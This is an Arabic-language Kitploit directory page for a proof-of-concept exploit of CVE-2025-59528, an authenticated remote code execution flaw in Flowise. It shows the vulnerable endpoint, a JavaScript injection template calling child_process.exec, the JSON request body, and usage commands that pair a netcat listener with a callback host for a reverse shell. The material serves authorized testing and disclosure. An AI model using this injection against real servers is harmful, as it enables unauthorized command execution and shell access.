Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59528 — إثبات المفهوم لـ CVE-2025-59528، يوضح تنفيذ الأوامر عن بُعد المُصادق عليه في Flowise عبر حقن mcpServerConfig، مع خطوات قابلة لإعادة الإنتاج للاختبار المصرح به. | Kitploit
أدوات/GitHubGitHub/nymiitechtips/cve-2025-59528
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubnymiitechtips/cve-2025-59528

CVE-2025-59528

إثبات المفهوم لـ CVE-2025-59528، يوضح تنفيذ الأوامر عن بُعد المُصادق عليه في Flowise عبر حقن mcpServerConfig، مع خطوات قابلة لإعادة الإنتاج للاختبار المصرح به.

عرض المستودع
18منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Version française

CVE-2025-59528 إثبات المفهوم

إثبات مفهوم (PoC) مبسّط يركز على التحقق التقني من الثغرة في بيئة مصرّح بها.

المتطلبات الأساسية

  • يجب أن يكون لديك حساب مستخدم على لوحة تحكم Flowise المستهدفة.
  • يجب أن يكون لديك مفتاح API صالح مرتبط بهذا الحساب.
  • يجب تشغيل مستمع (listener) على مضيف الاستدعاء قبل تشغيل إثبات المفهوم (مثال: nc -lvn 4444).

مثال الاستخدام

شغّل المستمع أولاً:

root@kitploit:~
nc -lvn 4444
root@kitploit:~
python3 poc.py --domain example.com --host 10.10.10.1 --port 4444 --api YOUR_VALID_API_KEY

استبدل القيم بإعدادات بيئتك المصرّح بها.

ملخص CVE

  • المنتج المتأثر: Flowise
  • الإصدارات المتأثرة: أقل من 3.0.5
  • النوع: تنفيذ التعليمات البرمجية عن بُعد (RCE)
  • نقطة الدخول: نقطة النهاية POST /api/v1/node-load-method/customMCP
  • تكمن المشكلة في كيفية معالجة inputs.mcpServerConfig: يتم تفسير هذه القيمة بطريقة تسمح بتنفيذ JavaScript من جانب الخادم. عمليًا، يمكن لمهاجم مصادق أن يحقن تعبيرًا يستدعي child_process وينفّذ أمر نظام تشغيل.

    آلية الاستغلال

    مسار الاستغلال هو:

    1. إنشاء طلب إلى نقطة النهاية customMCP.
    2. وضع تعبير JavaScript خبيث في mcpServerConfig.
    3. تشغيل process.mainModule.require('child_process').
    4. تنفيذ أمر نظام تشغيل (exec/execSync).

    إذا تم قبوله، ينفّذ الخادم الأمر في سياق نظامه.

    كيف يعمل إثبات المفهوم هذا (poc.py)

    يأخذ السكربت أربع وسائط:

    • -d/--domain: النطاق المستهدف
    • -lh/--host: عنوان IP للاستدعاء
    • -lp/--port: منفذ الاستدعاء
    • -A/--api: رمز API من نوع Bearer

    ثم يقوم بـ:

    1. بناء الرابط الضعيف: http://<domain>/api/v1/node-load-method/customMCP
    2. إضافة الترويسة Authorization: Bearer <token>
    3. تجهيز أمر استدعاء (callback) للقشرة
    4. حقن هذا الأمر في تعبير JS:
    root@kitploit:~
    ({
      x: (function () {
        const cp = process.mainModule.require("child_process");
        cp.exec("<commande>");
        return 1;
      })(),
    });
    
    1. إرسال هذا JSON:
    root@kitploit:~
    {
      "loadMethod": "listActions",
      "inputs": {
        "mcpServerConfig": "<injected JS expression>"
      }
    }
    
    1. طباعة حالة HTTP والاستجابة الخام للتحقق.

    لماذا هذا إثبات المفهوم أفضل (مقارنة بـ EDB 52440)

    مقارنةً بإثبات مفهوم EDB (الذي يقوم بتسجيل الدخول عبر البريد الإلكتروني/كلمة المرور، ويستخدم ترويسات شبيهة بالمتصفح، ويشغّل --cmd حر الشكل)، هذا السكربت أفضل للتحقق النقي من إثبات المفهوم:

    1. أكثر مباشرة: لا يوجد تدفق تسجيل دخول وضوضاء HTTP غير ضرورية أقل.
    2. سطح كسر أقل: خطوات أقل مرتبطة بإعدادات الواجهة الأمامية/المصادقة.
    3. أتمتة صديقة لـ CI: وسائط بسيطة ومخرجات سريعة.
    4. تحقق أوضح: يتم طباعة الحالة + النص فورًا.
    5. مركّز على مسار CVE الأساسي: حقن mcpServerConfig والتنفيذ من جانب الخادم.

    باختصار: سكربت EDB هو عرض توضيحي هجومي أكثر عمومية، بينما إثبات المفهوم هذا أكثر استهدافًا لإعادة الإنتاج التقنية.

    القيود الحالية

    • يفترض وجود رمز API صالح مسبقًا.
    • لا يوجد وضع https أو معالجة الشهادات.
    • لا يوجد منطق إعادة محاولة/تراجع (retry/backoff).
    • أمر الاستدعاء مكتوب بشكل ثابت (لم تتم معلمته بعد عبر --cmd).

    الاستخدام المسؤول

    اختبر فقط على الأنظمة التي تملكها أو التي لديك إذن صريح لاختبارها.

    تنزيل الأداة